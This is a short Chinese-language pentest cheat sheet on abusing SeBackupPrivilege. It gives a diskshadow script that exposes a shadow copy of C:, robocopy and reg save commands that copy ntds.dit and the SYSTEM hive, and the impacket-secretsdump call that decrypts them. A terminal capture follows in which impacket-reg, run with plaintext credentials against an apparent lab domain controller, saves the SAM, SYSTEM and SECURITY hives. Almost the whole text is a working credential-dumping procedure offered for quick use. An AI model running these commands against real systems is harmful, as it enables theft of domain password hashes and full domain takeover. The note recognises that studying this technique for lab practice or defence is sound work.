Volume Shadow Copies
1. 快速利用
权限: 一般是需要当前用户有 SeBackupPrivilege
#建一个文件,下面是文件内容
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
unix2dos raj.dsh #转换格式,兼容windows
cd C:\Temp
upload raj.dsh #winrm上操作
diskshadow /s raj.dsh
robocopy /b z:\windows\ntds . ntds.dit
reg save hklm\system c:\Temp\system
download ntds.dit
download system
然后使用 impacket-secretsdump 解密ntds.dit
impacket-secretsdump -ntds ntds.dit -system system local
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# impacket-reg babyad.com/BACKUP-OPT:Admin123@192.168.1.5 backup -o 'C:\windows\temp\'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to C:\windows\temp\\SAM.save
[*] Saved HKLM\SYSTEM to C:\windows\temp\\SYSTEM.save
[*] Saved HKLM\SECURITY to C:\windows\temp\\SECURITY.save